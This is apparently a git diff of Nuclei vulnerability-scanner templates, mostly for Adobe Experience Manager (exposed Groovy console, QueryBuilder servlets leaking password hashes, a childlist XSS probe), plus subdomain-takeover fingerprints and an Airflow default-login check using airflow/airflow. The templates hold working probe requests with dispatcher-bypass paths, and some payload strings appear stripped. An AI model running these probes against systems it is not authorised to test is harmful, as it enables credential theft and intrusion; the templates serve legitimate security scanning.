- '{{BaseURL}}///bin///wcm///search///gql.json///a.html?query=type:base%20limit:..1&pathPrefix=' - - stop-at-first-match: true - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - 'excerpt' - - 'path' - - 'hits' - condition: and diff --git a/nuclei-templates/Other/aem-groovyconsole-153.yaml b/nuclei-templates/Other/aem-groovyconsole-153.yaml deleted file mode 100644 index 9709becc71..0000000000 --- a/nuclei-templates/Other/aem-groovyconsole-153.yaml +++ /dev/null @@ -1,39 +0,0 @@ -id: aem-groovyconsole - -info: - name: AEM Groovy console enabled - author: x86rd - severity: critical - description: Groovy console is exposed, RCE is possible. - reference: https://hackerone.com/reports/672243 - tags: aem - -requests: - - method: GET - path: - - "{{BaseURL}}/groovyconsole" - - "{{BaseURL}}/api/groovyconsole" - - "{{BaseURL}}/aem/groovyconsole" - - "{{BaseURL}}/app/groovyconsole" - - "{{BaseURL}}/..%2f..%2f..%2fgroovyconsole" - - "{{BaseURL}}/..%2f..%2f..%2fapi/groovyconsole" - - "{{BaseURL}}/aem/..%2f..%2f..%2fgroovyconsole" - - "{{BaseURL}}/app/..%2f..%2f..%2fgroovyconsole" - - headers: - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 - Accept-Language: en-US,en;q=0.9,hi;q=0.8 - User-Agent: Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Mobile Safari/537.36 - - matchers-condition: and - matchers: - - type: word - words: - - "Groovy Console" - - "Run Script" - - "Groovy Web Console" - part: body - condition: and - - type: status - status: - - 200 \ No newline at end of file diff --git a/nuclei-templates/Other/aem-groovyconsole-155.yaml b/nuclei-templates/Other/aem-groovyconsole-155.yaml new file mode 100644 index 0000000000..a2a388a6ec --- /dev/null +++ b/nuclei-templates/Other/aem-groovyconsole-155.yaml @@ -0,0 +1,35 @@ +id: aem-groovyconsole + +info: + name: AEM Groovy console enabled + author: Dheerajmadhukar + severity: critical + description: Groovy console is exposed, RCE is possible. + reference: + - https://hackerone.com/reports/672243 + - https://twitter.com/XHackerx007/status/1435139576314671105 + tags: aem + +requests: + - method: GET + path: + - "{{BaseURL}}/groovyconsole" + - "{{BaseURL}}/etc/groovyconsole.html" + headers: + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 + Accept-Language: en-US,en;q=0.9,hi;q=0.8 + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + words: + - "Groovy Console" + - "Run Script" + - "Groovy Web Console" + part: body + condition: and + + - type: status + status: + - 200 \ No newline at end of file diff --git a/nuclei-templates/Other/aem-hash-querybuilder-157.yaml b/nuclei-templates/Other/aem-hash-querybuilder-157.yaml new file mode 100644 index 0000000000..50ae6efbd4 --- /dev/null +++ b/nuclei-templates/Other/aem-hash-querybuilder-157.yaml @@ -0,0 +1,29 @@ +id: aem-hash-querybuilder + +info: + author: DhiyaneshDk + name: Query hashed password via QueryBuilder Servlet + severity: medium + reference: https://twitter.com/AEMSecurity/status/1372392101829349376 + tags: aem + +requests: + - raw: + - | + GET /bin/querybuilder.json.;%0aa.css?p.hits=full&property=rep:authorizableId&type=rep:User HTTP/1.1 + Host: {{Hostname}} + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 + Accept-Language: en-US,en;q=0.5 + Accept-Encoding: gzip, deflate + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - '"success":true' + - 'rep:password' + condition: and \ No newline at end of file diff --git a/nuclei-templates/Other/aem-hash-querybuilder-159.yaml b/nuclei-templates/Other/aem-hash-querybuilder-159.yaml deleted file mode 100644 index ef0fc018a1..0000000000 --- a/nuclei-templates/Other/aem-hash-querybuilder-159.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: aem-hash-querybuilder -info: - author: DhiyaneshDk - name: Query hashed password via QueryBuilder Servlet - severity: medium - reference: https://twitter.com/AEMSecurity/status/1372392101829349376 - tags: aem -requests: - - raw: - - | - GET /bin/querybuilder.json.;%0aa.css?p.hits=full&property=rep:authorizableId&type=rep:User HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Accept-Language: en-US,en;q=0.5 - Accept-Encoding: gzip, deflate - Connection: close - Upgrade-Insecure-Requests: 1 - Cache-Control: max-age=0 - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - '"success":true' - - 'rep:password' diff --git a/nuclei-templates/Other/aem-jcr-querybuilder-162.yaml b/nuclei-templates/Other/aem-jcr-querybuilder-162.yaml deleted file mode 100644 index 3dfcd291c4..0000000000 --- a/nuclei-templates/Other/aem-jcr-querybuilder-162.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: aem-jcr-querybuilder - -info: - author: DhiyaneshDk - name: Query JCR role via QueryBuilder Servlet - severity: info - tags: aem - -requests: - - raw: - - | - GET /bin/querybuilder.json.;%0aa.css?p.hits=full&property=rep:authorizableId&type=rep:User HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Accept-Language: en-US,en;q=0.5 - Accept-Encoding: gzip, deflate - Connection: close - Upgrade-Insecure-Requests: 1 - Cache-Control: max-age=0 - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - '"success":true' - - 'jcr:uuid' \ No newline at end of file diff --git a/nuclei-templates/Other/aem-jcr-querybuilder.yaml b/nuclei-templates/Other/aem-jcr-querybuilder.yaml new file mode 100644 index 0000000000..15a5d6c4d4 --- /dev/null +++ b/nuclei-templates/Other/aem-jcr-querybuilder.yaml @@ -0,0 +1,28 @@ +id: aem-jcr-querybuilder + +info: + name: Query JCR role via QueryBuilder Servlet + author: DhiyaneshDk + severity: info + tags: aem + +requests: + - raw: + - | + GET /bin/querybuilder.json.;%0aa.css?p.hits=full&property=rep:authorizableId&type=rep:User HTTP/1.1 + Host: {{Hostname}} + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 + Accept-Language: en-US,en;q=0.5 + Accept-Encoding: gzip, deflate + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - '"success":true' + - 'jcr:uuid' + condition: and \ No newline at end of file diff --git a/nuclei-templates/Other/aem-login-status-170.yaml b/nuclei-templates/Other/aem-login-status-170.yaml new file mode 100644 index 0000000000..7a9051e7ef --- /dev/null +++ b/nuclei-templates/Other/aem-login-status-170.yaml @@ -0,0 +1,29 @@ +id: aem-login-status + +info: + name: AEM Login Status + author: DhiyaneshDk + severity: info + description: LoginStatusServlet is exposed, it allows to bruteforce credentials. + reference: + - https://www.slideshare.net/0ang3el/hunting-for-security-bugs-in-aem-webapps-129262212 + - https://github.com/thomashartm/burp-aem-scanner/blob/master/src/main/java/burp/actions/dispatcher/LoginStatusServletExposed.java + tags: aem,adobe + +requests: + - method: GET + path: + - '{{BaseURL}}/system/sling/loginstatus' + - '{{BaseURL}}/system/sling/loginstatus.css' + - '{{BaseURL}}///system///sling///loginstatus' + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - 'CREDENTIAL_CHALLENGE' diff --git a/nuclei-templates/Other/aem-login-status.yaml b/nuclei-templates/Other/aem-login-status.yaml deleted file mode 100644 index d8446f7869..0000000000 --- a/nuclei-templates/Other/aem-login-status.yaml +++ /dev/null @@ -1,24 +0,0 @@ -id: aem-login-status - -info: - author: DhiyaneshDk - name: AEM Login Status - severity: info - reference: https://www.slideshare.net/0ang3el/hunting-for-security-bugs-in-aem-webapps-129262212 - tags: aem - - -requests: - - method: GET - path: - - '{{BaseURL}}/system/sling/loginstatus.css' - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - 'CREDENTIAL_CHALLENGE' - condition: and diff --git a/nuclei-templates/Other/aem-merge-metadata-servlet.yaml b/nuclei-templates/Other/aem-merge-metadata-servlet.yaml index 0f174a63fe..94bdc1a137 100644 --- a/nuclei-templates/Other/aem-merge-metadata-servlet.yaml +++ b/nuclei-templates/Other/aem-merge-metadata-servlet.yaml @@ -1,13 +1,13 @@ id: aem-merge-metadata-servlet info: - author: DhiyaneshDk name: AEM MergeMetadataServlet + author: DhiyaneshDk severity: info - reference: https://speakerdeck.com/0ang3el/aem-hacker-approaching-adobe-experience-manager-webapps-in-bug-bounty-programs?slide=91 + reference: + - https://speakerdeck.com/0ang3el/aem-hacker-approaching-adobe-experience-manager-webapps-in-bug-bounty-programs?slide=91 tags: aem - requests: - method: GET path: diff --git a/nuclei-templates/Other/aem-querybuilder-feed-servlet-175.yaml b/nuclei-templates/Other/aem-querybuilder-feed-servlet-175.yaml new file mode 100644 index 0000000000..b180cc6888 --- /dev/null +++ b/nuclei-templates/Other/aem-querybuilder-feed-servlet-175.yaml @@ -0,0 +1,23 @@ +id: aem-querybuilder-feed-servlet + +info: + name: AEM QueryBuilder Feed Servlet + author: DhiyaneshDk + severity: info + reference: + - https://helpx.adobe.com/experience-manager/6-3/sites/developing/using/querybuilder-predicate-reference.html + tags: aem + +requests: + - method: GET + path: + - '{{BaseURL}}/bin/querybuilder.feed' + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - 'CQ Feed' \ No newline at end of file diff --git a/nuclei-templates/Other/aem-querybuilder-feed-servlet-177.yaml b/nuclei-templates/Other/aem-querybuilder-feed-servlet-177.yaml deleted file mode 100644 index 4f840f4bca..0000000000 --- a/nuclei-templates/Other/aem-querybuilder-feed-servlet-177.yaml +++ /dev/null @@ -1,23 +0,0 @@ -id: aem-querybuilder-feed-servlet - -info: - author: DhiyaneshDk - name: AEM QueryBuilder Feed Servlet - severity: info - reference: https://helpx.adobe.com/experience-manager/6-3/sites/developing/using/querybuilder-predicate-reference.html - tags: aem - - -requests: - - method: GET - path: - - '{{BaseURL}}/bin/querybuilder.feed' - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - 'CQ Feed' \ No newline at end of file diff --git a/nuclei-templates/Other/aem-querybuilder-internal-path-read-179.yaml b/nuclei-templates/Other/aem-querybuilder-internal-path-read-179.yaml new file mode 100644 index 0000000000..4aca466e0e --- /dev/null +++ b/nuclei-templates/Other/aem-querybuilder-internal-path-read-179.yaml @@ -0,0 +1,25 @@ +id: aem-querybuilder-internal-path-read +info: + author: DhiyaneshDk + name: AEM QueryBuilder Internal Path Read + severity: medium + reference: https://speakerdeck.com/0ang3el/aem-hacker-approaching-adobe-experience-manager-webapps-in-bug-bounty-programs?slide=91 + tags: aem +requests: + - method: GET + path: + - '{{BaseURL}}/bin/querybuilder.json.;%0aa.css?path=/home&p.hits=full&p.limit=-1' + - '{{BaseURL}}/bin/querybuilder.json.;%0aa.css?path=/etc&p.hits=full&p.limit=-1' + - '{{BaseURL}}/bin/querybuilder.json.css?path=/home&p.hits=full&p.limit=-1' + - '{{BaseURL}}/bin/querybuilder.json.css?path=/etc&p.hits=full&p.limit=-1' + stop-at-first-match: true + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - 'jcr:path' + - 'success' + condition: and diff --git a/nuclei-templates/Other/aem-querybuilder-internal-path-read.yaml b/nuclei-templates/Other/aem-querybuilder-internal-path-read.yaml deleted file mode 100644 index 6814086d48..0000000000 --- a/nuclei-templates/Other/aem-querybuilder-internal-path-read.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: aem-querybuilder-internal-path-read -info: - name: AEM QueryBuilder Internal Path Read - author: DhiyaneshDk - severity: medium - reference: - - https://speakerdeck.com/0ang3el/aem-hacker-approaching-adobe-experience-manager-webapps-in-bug-bounty-programs?slide=91 - tags: aem -requests: - - method: GET - path: - - '{{BaseURL}}/bin/querybuilder.json.;%0aa.css?path=/home&p.hits=full&p.limit=-1' - - '{{BaseURL}}/bin/querybuilder.json.;%0aa.css?path=/etc&p.hits=full&p.limit=-1' - - '{{BaseURL}}/bin/querybuilder.json.css?path=/home&p.hits=full&p.limit=-1' - - '{{BaseURL}}/bin/querybuilder.json.css?path=/etc&p.hits=full&p.limit=-1' - stop-at-first-match: true - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - 'jcr:path' - - 'success' - condition: and diff --git a/nuclei-templates/Other/aem-querybuilder-json-servlet-185.yaml b/nuclei-templates/Other/aem-querybuilder-json-servlet-185.yaml deleted file mode 100644 index 25de00970e..0000000000 --- a/nuclei-templates/Other/aem-querybuilder-json-servlet-185.yaml +++ /dev/null @@ -1,41 +0,0 @@ -id: aem-querybuilder-json-servlet - -info: - name: AEM QueryBuilder Json Servlet - author: DhiyaneshDk - severity: info - description: Sensitive information might be exposed via AEMs QueryBuilderServlet or QueryBuilderFeedServlet. - reference: - - https://helpx.adobe.com/experience-manager/6-3/sites/developing/using/querybuilder-predicate-reference.html - - https://github.com/thomashartm/burp-aem-scanner/blob/master/src/main/java/burp/actions/dispatcher/QueryBuilderExposed.java - tags: aem,adobe - -requests: - - method: GET - path: - - '{{BaseURL}}/bin/querybuilder.json' - - '{{BaseURL}}/bin/querybuilder.json.servlet' - - '{{BaseURL}}///bin///querybuilder.json' - - '{{BaseURL}}///bin///querybuilder.json.servlet' - - '{{BaseURL}}/bin/querybuilder.feed' - - '{{BaseURL}}/bin/querybuilder.feed.servlet' - - '{{BaseURL}}///bin///querybuilder.feed' - - ' {{BaseURL}}///bin///querybuilder.feed.servlet' - - stop-at-first-match: true - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - "application/json" - part: header - - - type: word - words: - - 'success' - - 'results' - condition: and diff --git a/nuclei-templates/Other/aem-querybuilder-json-servlet-186.yaml b/nuclei-templates/Other/aem-querybuilder-json-servlet-186.yaml new file mode 100644 index 0000000000..073fc99968 --- /dev/null +++ b/nuclei-templates/Other/aem-querybuilder-json-servlet-186.yaml @@ -0,0 +1,42 @@ +id: aem-querybuilder-json-servlet + +info: + author: DhiyaneshDk + name: AEM QueryBuilder Json Servlet + severity: info + description: Sensitive information might be exposed via AEMs QueryBuilderServlet or QueryBuilderFeedServlet. + reference: + - https://helpx.adobe.com/experience-manager/6-3/sites/developing/using/querybuilder-predicate-reference.html + - https://github.com/thomashartm/burp-aem-scanner/blob/master/src/main/java/burp/actions/dispatcher/QueryBuilderExposed.java + tags: aem,adobe + + +requests: + - method: GET + path: + - '{{BaseURL}}/bin/querybuilder.json' + - '{{BaseURL}}/bin/querybuilder.json.servlet' + - '{{BaseURL}}///bin///querybuilder.json' + - '{{BaseURL}}///bin///querybuilder.json.servlet' + - '{{BaseURL}}/bin/querybuilder.feed' + - '{{BaseURL}}/bin/querybuilder.feed.servlet' + - '{{BaseURL}}///bin///querybuilder.feed' + - ' {{BaseURL}}///bin///querybuilder.feed.servlet' + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "application/json" + part: header + + - type: word + words: + - 'success' + - 'results' + condition: and diff --git a/nuclei-templates/Other/aem-userinfo-servlet-190.yaml b/nuclei-templates/Other/aem-userinfo-servlet-190.yaml deleted file mode 100644 index a18d740fa1..0000000000 --- a/nuclei-templates/Other/aem-userinfo-servlet-190.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: aem-userinfo-servlet - -info: - name: AEM UserInfo Servlet Credentials Exposure - author: DhiyaneshDk - severity: info - description: "Adobe Experience Manager UserInfoServlet is exposed which allows an attacker to bruteforce credentials. You can get valid usernames from jcr:createdBy, jcr:lastModifiedBy, cq:LastModifiedBy attributes of any JCR node." - tags: aem,bruteforce - -requests: - - method: GET - path: - - '{{BaseURL}}/libs/cq/security/userinfo.json' - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - part: body - words: - - '"userID":' - - '"userName":' - condition: and - - - type: word - part: header - words: - - 'application/json' - -# Enhanced by mp on 2022/04/05 diff --git a/nuclei-templates/Other/aem-userinfo-servlet-193.yaml b/nuclei-templates/Other/aem-userinfo-servlet-193.yaml new file mode 100644 index 0000000000..01684b7d96 --- /dev/null +++ b/nuclei-templates/Other/aem-userinfo-servlet-193.yaml @@ -0,0 +1,31 @@ +id: aem-userinfo-servlet + +info: + author: DhiyaneshDk + name: AEM UserInfo Servlet + severity: info + description: UserInfoServlet is exposed which allows an attacker to bruteforce credentials. You can get valid usernames from jcr:createdBy, jcr:lastModifiedBy, cq:LastModifiedBy attributes of any JCR node. + tags: aem,bruteforce + + +requests: + - method: GET + path: + - '{{BaseURL}}/libs/cq/security/userinfo.json' + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: body + words: + - '"userID":' + - '"userName":' + condition: and + + - type: word + part: header + words: + - 'application/json' diff --git a/nuclei-templates/Other/aem-wcm-suggestions-servlet.yaml b/nuclei-templates/Other/aem-wcm-suggestions-servlet.yaml index 009f96d571..00145f1123 100644 --- a/nuclei-templates/Other/aem-wcm-suggestions-servlet.yaml +++ b/nuclei-templates/Other/aem-wcm-suggestions-servlet.yaml @@ -1,12 +1,13 @@ id: aem-wcm-suggestions-servlet + info: - author: DhiyaneshDk name: AEM WCM Suggestions Servlet + author: DhiyaneshDk severity: low - reference: https://speakerdeck.com/0ang3el/hunting-for-security-bugs-in-aem-webapps?slide=96 + reference: + - https://speakerdeck.com/0ang3el/hunting-for-security-bugs-in-aem-webapps?slide=96 tags: aem - requests: - method: GET path: diff --git a/nuclei-templates/Other/aem-xss-childlist-selector-197.yaml b/nuclei-templates/Other/aem-xss-childlist-selector-197.yaml new file mode 100644 index 0000000000..4480602e2f --- /dev/null +++ b/nuclei-templates/Other/aem-xss-childlist-selector-197.yaml @@ -0,0 +1,32 @@ +id: aem-xss-childlist-selector +info: + name: XSS in childlist selector + author: dhiyaneshDk + severity: medium + description: | + Requests using the selector childlist can an XSS when the dispatcher does not respect the content-type responded by AEM and flips from application/json to text/html. As a consequence the reflected suffix is executed and interpreted in the browser. + reference: + - https://github.com/thomashartm/burp-aem-scanner/blob/master/src/main/java/burp/actions/xss/FlippingTypeWithChildrenlistSelector.java + metadata: + shodan-query: + - http.title:"AEM Sign In" + - http.component:"Adobe Experience Manager" + tags: xss,aem,adobe +requests: + - method: GET + path: + - '{{BaseURL}}/etc/designs/xh1x.childrenlist.json//.html' + matchers-condition: and + matchers: + - type: word + words: + - '' + - '{"path":"/etc/designs/xh1x.childrenlist.json' + condition: and + - type: word + part: header + words: + - text/html + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/aem-xss-childlist-selector-198.yaml b/nuclei-templates/Other/aem-xss-childlist-selector-198.yaml deleted file mode 100644 index cc19c4643a..0000000000 --- a/nuclei-templates/Other/aem-xss-childlist-selector-198.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: aem-xss-childlist-selector -info: - name: XSS in childlist selector - author: dhiyaneshDk - severity: medium - description: | - Requests using the selector childlist can an XSS when the dispatcher does not respect the content-type responded by AEM and flips from application/json to text/html. As a consequence the reflected suffix is executed and interpreted in the browser. - reference: - - https://github.com/thomashartm/burp-aem-scanner/blob/master/src/main/java/burp/actions/xss/FlippingTypeWithChildrenlistSelector.java - metadata: - shodan-query: - - http.title:"AEM Sign In" - - http.component:"Adobe Experience Manager" - tags: xss,aem,adobe -requests: - - method: GET - path: - - '{{BaseURL}}/etc/designs/xh1x.childrenlist.json//.html' - matchers-condition: and - matchers: - - type: word - words: - - '' - - type: word - part: header - words: - - text/html - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/aem-xss-childlist.yaml b/nuclei-templates/Other/aem-xss-childlist.yaml deleted file mode 100644 index d4f043e435..0000000000 --- a/nuclei-templates/Other/aem-xss-childlist.yaml +++ /dev/null @@ -1,45 +0,0 @@ -id: aem-xss-childlist - -info: - name: Adobe Experience Manager 'Childlist selector' - Cross-Site Scripting - author: theabhinavgaur - severity: medium - description: | - Adobe Experience Manager contains a cross-site scripting vulnerability via requests using the selector childlist when the dispatcher does not respect the content-type responded by AEM and flips from application/json to text/html. As a consequence, the reflected suffix is executed and interpreted in the browser. - metadata: - verified: true - shodan-query: - - http.title:"AEM Sign In" - - http.component:"Adobe Experience Manager" - tags: xss,aem,adobe - - -http: - - method: GET - path: - - "{{BaseURL}}/{{rand_base(4)}}.childrenlist.html" - - "{{BaseURL}}/{{rand_base(4)}}

please%20authenticate

.childrenlist.html" - - stop-at-first-match: true - matchers-condition: and - matchers: - - type: word - part: body - words: - - '' - - '

please authenticate

' - condition: or - - - type: word - part: body - words: - - 'data-coral-columnview-id' - - - type: word - part: content_type - words: - - 'text/html' - - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/aerohive-netconfig-ui-200.yaml b/nuclei-templates/Other/aerohive-netconfig-ui-200.yaml index a0db356bbd..e5641facc7 100644 --- a/nuclei-templates/Other/aerohive-netconfig-ui-200.yaml +++ b/nuclei-templates/Other/aerohive-netconfig-ui-200.yaml @@ -1,42 +1,31 @@ -id: aerohive-netconfig-ui - -info: - name: Aerohive NetConfig UI - author: pussycat0x - severity: info - description: An Aerohive NetConfig user interface was detected. The NetConfig UI provides a fundamental set of configurations for configuring basic network and HiveManager connectivity settings, and uploading new IQ Engine images to Extreme Networks APs. - reference: - - https://docs.aerohive.com/330000/docs/help/english/ng/Content/reference/docs/online-help-systems.htm - metadata: - shodan-dork: 'http.title:"Aerohive NetConfig UI"' - tags: panel,tech,hiveos,aerohive - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 - cve-id: - cwe-id: CWE-200 - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php5" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'Aerohive NetConfig UI' - - - type: status - status: - - 200 - - extractors: - - type: regex - part: body - group: 1 - regex: - - 'version" align="right" valign="bottom">([0-9.a-z]+)<\/td>' - -# Enhanced by mp on 2022/03/21 +id: aerohive-netconfig-ui +info: + name: Aerohive NetConfig UI + author: pussycat0x + severity: info + metadata: + shodan-dork: 'http.title:"Aerohive NetConfig UI"' + tags: panel,tech,hiveos,aerohive + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php5" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Aerohive NetConfig UI' + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - 'version" align="right" valign="bottom">([0-9.a-z]+)<\/td>' diff --git a/nuclei-templates/Other/aftership-takeover-204.yaml b/nuclei-templates/Other/aftership-takeover-204.yaml new file mode 100644 index 0000000000..2249dbf383 --- /dev/null +++ b/nuclei-templates/Other/aftership-takeover-204.yaml @@ -0,0 +1,18 @@ +id: aftership-takeover + +info: + name: Aftership Takeover Detection + author: pdteam + severity: high + tags: takeover + reference: https://github.com/EdOverflow/can-i-take-over-xyz + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers: + - type: word + words: + - Oops.

The page you're looking for doesn't exist. \ No newline at end of file diff --git a/nuclei-templates/Other/aftership-takeover-206.yaml b/nuclei-templates/Other/aftership-takeover-206.yaml deleted file mode 100644 index 9407e028c7..0000000000 --- a/nuclei-templates/Other/aftership-takeover-206.yaml +++ /dev/null @@ -1,15 +0,0 @@ -id: aftership-takeover -info: - name: Aftership Takeover Detection - author: pdteam - severity: high - tags: takeover - reference: https://github.com/EdOverflow/can-i-take-over-xyz -requests: - - method: GET - path: - - "{{BaseURL}}" - matchers: - - type: word - words: - - Oops.

The page you're looking for doesn't exist. diff --git a/nuclei-templates/Other/agilecrm-takeover-208.yaml b/nuclei-templates/Other/agilecrm-takeover-210.yaml similarity index 100% rename from nuclei-templates/Other/agilecrm-takeover-208.yaml rename to nuclei-templates/Other/agilecrm-takeover-210.yaml diff --git a/nuclei-templates/Other/aha-takeover-213.yaml b/nuclei-templates/Other/aha-takeover-213.yaml new file mode 100644 index 0000000000..649b36b6e5 --- /dev/null +++ b/nuclei-templates/Other/aha-takeover-213.yaml @@ -0,0 +1,15 @@ +id: aha-takeover +info: + name: Aha Takeover Detection + author: pdcommunity + severity: high + tags: takeover + reference: https://github.com/EdOverflow/can-i-take-over-xyz +requests: + - method: GET + path: + - "{{BaseURL}}" + matchers: + - type: word + words: + - There is no portal here ... sending you back to Aha! diff --git a/nuclei-templates/Other/aha-takeover.yaml b/nuclei-templates/Other/aha-takeover.yaml deleted file mode 100644 index 854e9de4a5..0000000000 --- a/nuclei-templates/Other/aha-takeover.yaml +++ /dev/null @@ -1,19 +0,0 @@ -id: aha-takeover -info: - name: Aha - Subdomain Takeover Detection - author: pdteam - severity: high - description: An Aha subdomain takeover was detected. - reference: - - https://github.com/EdOverflow/can-i-take-over-xyz - tags: takeover -requests: - - method: GET - path: - - "{{BaseURL}}" - matchers: - - type: word - words: - - There is no portal here ... sending you back to Aha! - -# Enhanced by mp on 2022/07/19 diff --git a/nuclei-templates/Other/aims-password-mgmt-client-221.yaml b/nuclei-templates/Other/aims-password-mgmt-client-221.yaml new file mode 100644 index 0000000000..c6f768a5c9 --- /dev/null +++ b/nuclei-templates/Other/aims-password-mgmt-client-221.yaml @@ -0,0 +1,27 @@ +id: aims-password-mgmt-client + +info: + name: Aims Password Management Client Detect + author: iamthefrogy + description: An Aims Password management client was detected. + severity: info + tags: panel,aims + reference: + - https://www.avatier.com/products/identity-management/password-management/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cve-id: + cwe-id: CWE-200 + +requests: + - method: GET + path: + - "{{BaseURL}}/aims/ps/" + + matchers: + - type: word + words: + - "Avatier Corporation" + +# Enhanced by mp on 2022/03/21 diff --git a/nuclei-templates/Other/aims-password-mgmt-client.yaml b/nuclei-templates/Other/aims-password-mgmt-client.yaml deleted file mode 100644 index a178296f3f..0000000000 --- a/nuclei-templates/Other/aims-password-mgmt-client.yaml +++ /dev/null @@ -1,17 +0,0 @@ -id: aims-password-mgmt-client - -info: - name: Aims Password Management Client Detect - author: iamthefrogy - severity: info - tags: panel,aims - -requests: - - method: GET - path: - - "{{BaseURL}}/aims/ps/" - - matchers: - - type: word - words: - - "Avatier Corporation" diff --git a/nuclei-templates/Other/aims-password-portal-222.yaml b/nuclei-templates/Other/aims-password-portal-222.yaml index eb21d8e0eb..800dd21cad 100644 --- a/nuclei-templates/Other/aims-password-portal-222.yaml +++ b/nuclei-templates/Other/aims-password-portal-222.yaml @@ -5,7 +5,7 @@ info: author: dhiyaneshDK severity: info reference: https://www.exploit-db.com/ghdb/6576 - tags: panel + tags: panel,aims requests: - method: GET diff --git a/nuclei-templates/Other/airee-takeover-228.yaml b/nuclei-templates/Other/airee-takeover-228.yaml deleted file mode 100644 index e63a59bcc0..0000000000 --- a/nuclei-templates/Other/airee-takeover-228.yaml +++ /dev/null @@ -1,19 +0,0 @@ -id: airee-takeover - -info: - name: Airee Takeover Detection - author: pdteam - severity: high - - reference: https://github.com/EdOverflow/can-i-take-over-xyz - -requests: - - method: GET - path: - - "{{BaseURL}}" - - matchers: - - type: word - name: airee - words: - - 'Ошибка 402. Сервис Айри.рф не оплачен' \ No newline at end of file diff --git a/nuclei-templates/Other/airee-takeover.yaml b/nuclei-templates/Other/airee-takeover.yaml new file mode 100644 index 0000000000..b0ab7e7b52 --- /dev/null +++ b/nuclei-templates/Other/airee-takeover.yaml @@ -0,0 +1,17 @@ +id: airee-takeover +info: + name: Airee Takeover Detection + author: pdteam + severity: high + reference: + - https://github.com/EdOverflow/can-i-take-over-xyz + tags: takeover +requests: + - method: GET + path: + - "{{BaseURL}}" + matchers: + - type: word + name: airee + words: + - 'Ошибка 402. Сервис Айри.рф не оплачен' diff --git a/nuclei-templates/Other/airflow-debug.yaml b/nuclei-templates/Other/airflow-debug.yaml index 7e88c457d2..dc6f4a4a58 100644 --- a/nuclei-templates/Other/airflow-debug.yaml +++ b/nuclei-templates/Other/airflow-debug.yaml @@ -4,9 +4,6 @@ info: name: Airflow Debug Trace author: pdteam severity: low - metadata: - verified: true - shodan-query: title:"Airflow - DAGs" tags: apache,airflow,fpd requests: diff --git a/nuclei-templates/Other/airflow-default-login-235.yaml b/nuclei-templates/Other/airflow-default-login-235.yaml deleted file mode 100644 index cef2568e5d..0000000000 --- a/nuclei-templates/Other/airflow-default-login-235.yaml +++ /dev/null @@ -1,49 +0,0 @@ -id: airflow-default-login -info: - name: Apache Airflow Default Login - author: pdteam - severity: critical - tags: airflow,default-login,apache - reference: https://airflow.apache.org/docs/apache-airflow/stable/start/docker.html - metadata: - shodan-query: title:"Sign In - Airflow" -requests: - - raw: - - | - GET /login/ HTTP/1.1 - Host: {{Hostname}} - Origin: {{BaseURL}} - - | - POST /login/ HTTP/1.1 - Host: {{Hostname}} - Origin: {{BaseURL}} - Content-Type: application/x-www-form-urlencoded - Referer: {{BaseURL}}/admin/airflow/login - - username={{username}}&password={{password}}&_csrf_token={{csrf_token}} - attack: pitchfork - payloads: - username: - - airflow - password: - - airflow - cookie-reuse: true - extractors: - - type: regex - name: csrf_token - group: 1 - internal: true - regex: - - 'type="hidden" value="(.*?)">' - req-condition: true - matchers-condition: and - matchers: - - type: dsl - dsl: - - 'contains(body_1, "Sign In - Airflow")' - - 'contains(all_headers_2, "session=.")' - - 'status_code_2 == 302' - condition: and - - type: word - words: - - 'You should be redirected automatically to target URL: ' diff --git 